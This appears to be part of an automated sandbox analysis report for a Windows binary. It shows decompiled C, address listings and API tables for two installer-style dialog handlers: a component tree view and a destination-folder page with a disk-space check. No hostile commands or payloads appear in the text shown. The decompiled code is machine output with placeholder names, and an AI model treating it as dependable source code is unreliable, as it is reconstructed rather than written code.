Opcode Fuzzy Hash: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
Instruction Fuzzy Hash: 0BA13A71900208FFDB11AFA1DC89AAF7F79FB04355F00817AFA05AA2A0C7755A41DF99

Uniqueness

Uniqueness Score: -1.00%

Function 00404802, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00404802(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x42ec48; // 0x6c03dc
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x42ec30; // 0x6c0230
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x42ec39 & 0x00000002;
							if(( *0x42ec39 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404782(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x42ec38; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x42a07c;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42a094;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x42a07c = _t315;
									 *0x42a094 = _t315;
									 *0x42ec80 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x42ec39 & 0x00000001;
										if(( *0x42ec39 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x42ec4c - _t315; // 0x4
										_v32 =  *0x42a094;
										_t196 =  *0x42ec48; // 0x6c03dc
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42e3fc; // 0x6c6eb3
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E0040473D(0x3ff, 0xfffffffb, E00404755(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x6c03e4
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x6c03f4
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x42ec4c; // 0x4
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42a094);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x42ec80 = _a4;
					_t247 =  *0x42ec4c; // 0x4
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42a094 = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x42ec20, 0x6e);
					 *0x42a088 =  *0x42a088 | 0xffffffff;
					_v24 = _t250;
					 *0x42a090 = SetWindowLongA(_v8, 0xfffffffc, E00404E03);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42a07c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42a07c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BE9(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E83(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E83(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x42ec4c - _t318; // 0x4
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42a094 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42a094 + _t318 * 4) = _t274;
									_t288 =  *( *0x42a094 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x42ec4c; // 0x4
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403EB8(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403EB8(_v12);
								L89:
								return E00403EEA(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404820
0x00404826
0x00404828
0x0040482e
0x00404834
0x00404837
0x00404841
0x0040484a
0x0040484d
0x00404850
0x00404a78
0x00404a78
0x00404a7f
0x00404a93
0x00404a81
0x00404a83
0x00404a86
0x00404a87
0x00404a8e
0x00404a8e
0x00404a96
0x00404a9f
0x00404aaa
0x00404aaa
0x00404aad
0x00404ab0
0x00404abf
0x00404abf
0x00404ac6
0x00404b3e
0x00404b3e
0x00404b41
0x00404b43
0x00404b46
0x00404b4d
0x00404b5b
0x00404b5b
0x00404b5d
0x00404b60
0x00404b67
0x00404b69
0x00404b6d
0x00404b8a
0x00404b8e
0x00404b8e
0x00404b6f
0x00404b7c
0x00404b7c
0x00404b6d
0x00404b67
0x00000000
0x00404b41
0x00404ac8
0x00404acb
0x00404ad6
0x00404ad8
0x00404adb
0x00404ae2
0x00404ae7
0x00404ae9
0x00404af3
0x00404af3
0x00404af7
0x00404af9
0x00404afc
0x00404afe
0x00404b01
0x00404b17
0x00404b17
0x00404b03
0x00404b03
0x00404b09
0x00404b0b
0x00404b12
0x00404b0d
0x00404b0d
0x00404b0d
0x00404b0b
0x00404b1b
0x00404b1d
0x00404b22
0x00404b2b
0x00404b2c
0x00404b36
0x00404b36
0x00404b38
0x00404b3b
0x00404b3b
0x00404afc
0x00000000
0x00404ae9
0x00404acd
0x00404ad0
0x00404ad4
0x00000000
0x00000000
0x00000000
0x00404ad4
0x00404ab2
0x00404ab9
0x00000000
0x00000000
0x00000000
0x00404aa1
0x00404aa1
0x00404aa4
0x00404b91
0x00404b91
0x00404b98
0x00404c0c
0x00404c0c
0x00404c13
0x00404c1f
0x00404c1f
0x00404c21
0x00404c28
0x00404c2a
0x00404c2f
0x00404c31
0x00404c34
0x00404c34
0x00404c3a
0x00404c3f
0x00404c41
0x00404c44
0x00404c44
0x00404c4a
0x00404c50
0x00404c56
0x00404c56
0x00404c5c
0x00404c63
0x00404db0
0x00404db0
0x00404db7
0x00404db9
0x00404dc0
0x00404dc4
0x00404dd1
0x00404dd1
0x00404dd4
0x00404dda
0x00404dec
0x00404dec
0x00404dc0
0x00000000
0x00404c69
0x00404c6b
0x00404c70
0x00404c73
0x00404c77
0x00404c77
0x00404c7c
0x00404c7f
0x00404cc0
0x00404cc2
0x00404ccc
0x00404cd2
0x00404cd5
0x00404cda
0x00404ce1
0x00404ce4
0x00404d86
0x00404d8c
0x00404d92
0x00404d97
0x00404d9a
0x00404dab
0x00404dab
0x00000000
0x00404cea
0x00404cea
0x00404cea
0x00404ced
0x00404cf3
0x00404cf6
0x00404cf8
0x00404cfa
0x00404cfc
0x00404cff
0x00404d02
0x00404d09
0x00404d0b
0x00404d0e
0x00404d15
0x00404d18
0x00404d18
0x00404d18
0x00404d18
0x00404d1c
0x00404d1f
0x00404d2b
0x00404d2c
0x00404d2f
0x00404d31
0x00404d31
0x00404d31
0x00404d21
0x00404d23
0x00404d23
0x00404d50
0x00404d50
0x00404d51
0x00404d5d
0x00404d6c
0x00404d6c
0x00404d6e
0x00404d71
0x00404d7a
0x00404d7a
0x00000000
0x00404ced
0x00404c81
0x00404c8c
0x00404c8f
0x00404c94
0x00404c96
0x00404c98
0x00404c9a
0x00404caa
0x00404cb4
0x00404cb6
0x00404cb9
0x00000000
0x00000000
0x00000000
0x00000000
0x00404c9c
0x00404c9c
0x00404c9c
0x00404c9f
0x00404ca2
0x00404ca4
0x00404ca4
0x00404ca4
0x00404ca5
0x00404ca6
0x00404ca6
0x00000000
0x00404c9c
0x00404c7f
0x00404c63
0x00404b9a
0x00404ba0
0x00000000
0x00000000
0x00404bac
0x00404bb0
0x00000000
0x00000000
0x00404bc0
0x00404bc2
0x00404bc5
0x00000000
0x00000000
0x00404bd7
0x00404bd9
0x00404bdc
0x00404be6
0x00404be8
0x00404be9
0x00404bea
0x00404bf9
0x00404bfb
0x00404c02
0x00404c05
0x00000000
0x00404c05
0x00404bde
0x00404be1
0x00404be4
0x00000000
0x00000000
0x00000000
0x00404be4
0x00000000
0x00404aa4
0x00404856
0x0040485b
0x00404860
0x00404865
0x00404866
0x0040486f
0x0040487a
0x00404885
0x0040488b
0x00404899
0x004048ae
0x004048b3
0x004048be
0x004048c7
0x004048dc
0x004048ed
0x004048fa
0x004048fa
0x004048ff
0x00404905
0x00404907
0x0040490a
0x0040490f
0x00404914
0x00404916
0x00404916
0x00404936
0x00404936
0x00404938
0x00404939
0x0040493e
0x00404941
0x00404944
0x00404948
0x0040494d
0x00404952
0x00404956
0x0040495b
0x00404960
0x00404962
0x00404964
0x0040496a
0x00404a34
0x00404a47
0x00000000
0x00404970
0x00404973
0x00404976
0x00404979
0x00404979
0x0040497f
0x00404985
0x00404988
0x0040498e
0x0040498f
0x00404994
0x0040499d
0x004049a4
0x004049a7
0x004049aa
0x004049ad
0x004049e7
0x004049e9
0x00404a12
0x004049eb
0x004049f8
0x004049f8
0x004049af
0x004049b2
0x004049c1
0x004049cb
0x004049d3
0x004049da
0x004049e2
0x004049e2
0x004049ad
0x00404a18
0x00404a19
0x00404a1f
0x00404a25
0x00404a25
0x00404a32
0x00404a4d
0x00404a51
0x00404a6e
0x00404a73
0x00404a76
0x00404a76
0x00000000
0x00404a53
0x00404a58
0x00404a61
0x00404dee
0x00404e00
0x00404e00
0x00404a51
0x00000000
0x00404a32
0x0040496a

APIs

GetDlgItem.USER32 ref: 00404819
GetDlgItem.USER32 ref: 00404826
GlobalAlloc.KERNEL32(00000040,00000004), ref: 00404872
LoadBitmapA.USER32 ref: 00404885
SetWindowLongA.USER32 ref: 0040489F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048B3
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004048C7
SendMessageA.USER32 ref: 004048DC
SendMessageA.USER32 ref: 004048E8
SendMessageA.USER32 ref: 004048FA
DeleteObject.GDI32(?), ref: 004048FF
SendMessageA.USER32 ref: 0040492A
SendMessageA.USER32 ref: 00404936
SendMessageA.USER32 ref: 004049CB
SendMessageA.USER32 ref: 004049F6
SendMessageA.USER32 ref: 00404A0A
GetWindowLongA.USER32 ref: 00404A39
SetWindowLongA.USER32 ref: 00404A47
ShowWindow.USER32(?,00000005), ref: 00404A58
SendMessageA.USER32 ref: 00404B5B
SendMessageA.USER32 ref: 00404BC0
SendMessageA.USER32 ref: 00404BD5
SendMessageA.USER32 ref: 00404BF9
SendMessageA.USER32 ref: 00404C1F
ImageList_Destroy.COMCTL32(?), ref: 00404C34
GlobalFree.KERNEL32 ref: 00404C44
SendMessageA.USER32 ref: 00404CB4
SendMessageA.USER32 ref: 00404D5D
SendMessageA.USER32 ref: 00404D6C
InvalidateRect.USER32(?,00000000,00000001), ref: 00404D8C
ShowWindow.USER32(?,00000000), ref: 00404DDA
GetDlgItem.USER32 ref: 00404DE5
ShowWindow.USER32(00000000), ref: 00404DEC

Strings

N, xrefs: 00404A96
M, xrefs: 004049B2
, xrefs: 00404DC4

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
Instruction ID: 6f0a98d5dd10ef4145f29f69d97320cca22844812bd755e22afdd9aff1593a00
Opcode Fuzzy Hash: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
Instruction Fuzzy Hash: A702B1B0A00209EFEB25CF95DD45AAE7BB5FB84314F10413AF610BA2E1C7799A41CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004042C1, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E004042C1(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x429870;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x42f000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040546C(0x3fb, _t146);
					E00405E29(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040546C(0x3fb, _t146);
							if(E0040579B(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405BC7(0x429068, _t146);
							_t87 = E00405F57(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405BC7(0x429068, _t146);
								_t89 = E0040574E(0x429068);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429068,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429068) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429068,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E00405701(0x429068) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429068) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404755(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42e3fc; // 0x6c6eb3
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E0040473D(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429058);
									} else {
										E00404678(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42ecc4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403EA5(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a08c == _t158) {
									E00404256();
								}
								 *0x42a08c = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a0a0;
							_v60 = E00404612;
							_v56 = _t146;
							_v68 = E00405BE9(_t146, 0x42a0a0, _t166, 0x429470, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004056BA(_t146);
								_t124 =  *0x42ec30; // 0x6c0230
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
									E00405BE9(_t146, 0x42a0a0, _t166, 0, _t125);
									if(lstrcmpiA(0x42dbc0, 0x42a0a0) != 0) {
										lstrcatA(_t146, 0x42dbc0);
									}
								}
								 *0x42a08c =  *0x42a08c + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405727(_t146) != 0 && E0040574E(_t146) == 0) {
						E004056BA(_t146);
					}
					 *0x42e3f8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E83(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E83(_t166);
					E00403EB8(_t165);
					_t138 = E00405F57(0xa);
					if(_t138 == 0) {
						L53:
						return E00403EEA(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}

0x004042c1
0x004042c7
0x004042cd
0x004042da
0x004042e8
0x004042eb
0x004042f3
0x004042f9
0x004042f9
0x00404305
0x00404308
0x00404376
0x0040437d
0x00404454
0x0040445b
0x0040446a
0x0040446a
0x0040446e
0x00404478
0x00404485
0x00404487
0x00404487
0x00404495
0x0040449c
0x004044a3
0x004044a6
0x004044dd
0x004044df
0x004044e5
0x004044ea
0x004044ee
0x004044f0
0x004044f0
0x0040450c
0x00000000
0x0040450e
0x00404511
0x0040451f
0x00404525
0x00404526
0x00404529
0x0040452c
0x00000000
0x0040452c
0x004044a8
0x004044aa
0x004044ae
0x00000000
0x00000000
0x00000000
0x00000000
0x004044b0
0x004044b0
0x004044bd
0x004044c2
0x00000000
0x00000000
0x004044c6
0x004044c8
0x004044c8
0x004044d3
0x004044d6
0x004044db
0x00000000
0x00000000
0x00000000
0x00000000
0x004044db
0x00404538
0x00404542
0x00404545
0x00404548
0x0040454f
0x0040454f
0x00404551
0x00404551
0x00404556
0x00404558
0x00404560
0x00404567
0x00404569
0x00404574
0x00404574
0x00404569
0x0040457b
0x00404584
0x0040458e
0x00404596
0x004045b1
0x00404598
0x004045a1
0x004045a1
0x00404596
0x004045b6
0x004045bb
0x004045c0
0x004045c9
0x004045c9
0x004045d2
0x004045d4
0x004045d4
0x004045e0
0x004045e8
0x004045f2
0x004045f2
0x004045f7
0x00000000
0x004045f7
0x004044a6
0x0040445d
0x00404464
0x00000000
0x00000000
0x00000000
0x00404464
0x00404383
0x0040438c
0x004043a6
0x004043ab
0x004043b5
0x004043bc
0x004043c8
0x004043cb
0x004043ce
0x004043d5
0x004043dd
0x004043e0
0x004043e4
0x004043eb
0x004043f3
0x0040444d
0x004043f5
0x004043f6
0x004043fd
0x00404402
0x00404407
0x0040440f
0x0040441c
0x00404430
0x00404434
0x00404434
0x00404430
0x00404439
0x00404446
0x00404446
0x004043f3
0x00000000
0x004043ab
0x00404399
0x00000000
0x00000000
0x0040439f
0x00000000
0x0040430a
0x00404317
0x00404320
0x0040432d
0x0040432d
0x00404334
0x0040433a
0x00404343
0x00404346
0x00404349
0x00404351
0x00404354
0x00404357
0x0040435d
0x00404364
0x0040436b
0x004045fd
0x0040460f
0x00404371
0x00404374
0x00000000
0x00404374
0x0040436b

APIs

GetDlgItem.USER32 ref: 00404310
SetWindowTextA.USER32(00000000,?), ref: 0040433A
SHBrowseForFolderA.SHELL32(?,00429470,?), ref: 004043EB
CoTaskMemFree.OLE32(00000000), ref: 004043F6
lstrcmpiA.KERNEL32(TclpOwkq,0042A0A0,00000000,?,?), ref: 00404428
